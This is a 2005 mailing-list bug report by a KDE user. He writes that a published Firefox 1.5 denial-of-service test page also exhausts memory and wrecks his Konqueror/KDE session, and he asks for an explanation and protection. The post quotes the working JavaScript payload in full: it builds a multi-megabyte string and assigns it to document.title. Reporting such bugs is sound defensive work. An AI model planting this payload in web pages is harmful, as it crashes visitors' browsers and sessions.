Firefox DoS attack affects konqueror/KDE too

Pavel Troller patrol at sinus.cz
Mon Dec 12 10:36:43 GMT 2005


Hi!
  Recently I've read about the Firefox 1.5 DoS attack
( http://www.eweek.com/article2/0,1895,1898253,00.asp ) and tried the testing
URL ( http://atom.mamto.cz/projekty/bugs/firefox/test.html ) with konqueror
from a recent KDE3.5 branch.
  Immediately after clicking on the link, my system became unresponsive,
the HDD LED was on permanently and after a while, it ended up with the kernel OOM
killer killing not only konqueror, but also klauncher, konsole, kwin and
others, so my whole KDE session was wrecked and I had to log in again. All this on a
machine with 512 M of RAM and the same amount of swap.
  In the exploit, there is the following malicious js code:

<script type="text/javascript">
function ex() {
var buffer = "";
for (var i = 0; i < 5000; i++) {
buffer += "A";
}
var buffer2 = buffer;
for (i = 0; i < 500; i++) {
buffer2 += buffer;
}
document.title = buffer2;
}
</script>

  To my eyes, it looks like it generates a 2.5M long string and then sets it as
the document.title. Why did such a manipulation exhaust all the system's memory?
Isn't there a bug somewhere? And how can I protect the system against this?

  On the other hand, it should be said that konqueror is not vulnerable in the
same way as Firefox; there is no need to erase any files before using it again.

                   With regards, Pavel Troller




More information about the kfm-devel mailing list